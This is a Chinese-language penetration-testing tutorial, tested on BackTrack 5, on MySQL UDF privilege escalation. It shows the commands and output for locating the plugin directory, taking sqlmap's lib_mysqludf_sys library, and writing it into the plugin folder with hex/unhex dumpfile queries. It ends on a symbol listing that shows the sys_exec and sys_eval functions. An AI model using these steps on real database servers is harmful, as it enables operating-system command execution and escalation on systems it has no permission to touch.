環(huán)境:
os:linux(bt5)
database:mysql
簡(jiǎn)述:
通過(guò)自定義庫(kù)函數(shù)來(lái)實(shí)現(xiàn)執(zhí)行任意的程序,這里只在linux下測(cè)試通過(guò),具體到windows,所用的dll自然不同。
要求:
在mysql庫(kù)下必須有func表,并且在‑‑skip‑grant‑tables開(kāi)啟的情況下,UDF會(huì)被禁止;
過(guò)程: 得到插件庫(kù)路徑 找對(duì)應(yīng)操作系統(tǒng)的udf庫(kù)文件 利用udf庫(kù)文件加載函數(shù)并執(zhí)行命令
1,得到插件庫(kù)路徑
| mysql> show variables like "%plugin%";+---------------+-----------------------+| Variable_name | Value |+---------------+-----------------------+| plugin_dir | /usr/lib/mysql/plugin |+---------------+-----------------------+1 row in set (0.00 sec) |
2,找對(duì)應(yīng)操作系統(tǒng)的udf庫(kù)文件
因?yàn)樽约簻y(cè)試,看了下自己系統(tǒng)的版本,64位
| root@bt:~# uname -aLinux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux |
對(duì)于udf文件,在sqlmap工具中自帶就有,只要找對(duì)應(yīng)操作系統(tǒng)的版本即可
| root@bt:/pentest/database/sqlmap/udf/mysql# lslinux windowsroot@bt:/pentest/database/sqlmap/udf/mysql/linux# ls32 64root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# lslib_mysqludf_sys.so |
3,利用udf庫(kù)文件加載函數(shù)并執(zhí)行命令
首先要得到udf庫(kù)文件的十六進(jìn)制格式,可在本地通過(guò)
| mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';Query OK, 1 row affected (0.04 sec) |
因?yàn)槲覝y(cè)試時(shí),使用自帶賬戶,賬戶名mysql,并不是root,所以插件目錄不可寫(xiě),而實(shí)際中,一般udf提權(quán)都是用root權(quán)限啟動(dòng)的mysql程序,故,不存在目錄權(quán)限不足,不能訪問(wèn)的情況。為了繼續(xù),修改目錄權(quán)限
root@bt:~# chmod 777 /usr/lib/mysql/plugin
數(shù)據(jù)庫(kù)中寫(xiě)入udf庫(kù)到mysql庫(kù)目錄:
| mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';Query OK, 1 row affected (0.04 sec) |
查看下這個(gè)udf庫(kù)所支持的函數(shù)
| root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so w _Jv_RegisterClasses0000000000201788 A __bss_start w __cxa_finalize w __gmon_start__0000000000201788 A _edata0000000000201798 A _end0000000000001178 T _fini0000000000000ba0 T _init U fgets U fork U free U getenv000000000000101a T lib_mysqludf_sys_info0000000000000da4 T lib_mysqludf_sys_info_deinit0000000000001047 T lib_mysqludf_sys_info_init U malloc U mmap U pclose U popen U realloc U setenv U strcpy U strncpy0000000000000dac T sys_bineval0000000000000dab T sys_bineval_deinit0000000000000da8 T sys_bineval_init0000000000000e46 T sys_eval0000000000000da7 T sys_eval_deinit0000000000000f2e T sys_eval_init0000000000001066 T sys_exec0000000000000da6 T sys_exec_deinit0000000000000f57 T sys_exec_init00000000000010f7 T sys_get0000000000000da5 T sys_get_deinit0000000000000fea T sys_get_init000000000000107a T sys_set00000000000010e8 T sys_set_deinit0000000000000f80 T sys_set_init U sysconf U system U waitpid |
